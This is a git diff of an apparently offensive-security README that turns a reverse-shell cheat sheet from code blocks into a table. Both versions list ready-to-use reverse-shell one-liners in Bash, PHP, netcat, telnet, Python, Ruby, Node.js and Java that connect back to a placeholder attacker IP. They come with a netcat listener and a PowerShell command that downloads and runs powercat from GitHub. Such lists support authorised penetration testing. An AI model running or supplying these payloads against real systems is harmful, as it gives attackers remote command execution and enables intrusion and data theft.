diff --git a/README.md b/README.md
index e074d35..f051bf0 100644
--- a/README.md
+++ b/README.md
@@ -281,57 +281,21 @@ function printit ($string) { ?> ``` - - * Listen Port -``` -ncat -vlnp 4444 -``` - - * Bash -``` -bash -i >& /dev/tcp/IP/4444 0>&1 -bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' -``` - * PHP -``` -php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` -``` - * NC -``` -nc -e /bin/sh ^IP^ 5566` -``` - * Telnet -``` -mknod backpipe p && telnet ^IP^ 5566 0backpipe` -``` - * Python -``` -python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` -``` - - * Ruby -``` -ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` -``` - - * Node.js -``` -var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); -``` -``` -require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` -``` - * Java -```Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` -``` -``` -java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html -``` - - * Powershell -``` -powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd -``` +| Program | Command | +|----------|---------| +| Netcat Listen | ncat -vlnp 4444 | +| Bash | bash -i >& /dev/tcp/IP/4444 0>&1 | +| Bash | bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' | +| PHP | php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` | +| Netcat Connect | nc -e /bin/sh ^IP^ 5566`| +| Telnet | mknod backpipe p && telnet ^IP^ 5566 
0backpipe` | +| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` | +| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` | +| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); | +| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` | +| Java | Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` | +| Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html | +| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd | ### Spawning a Shell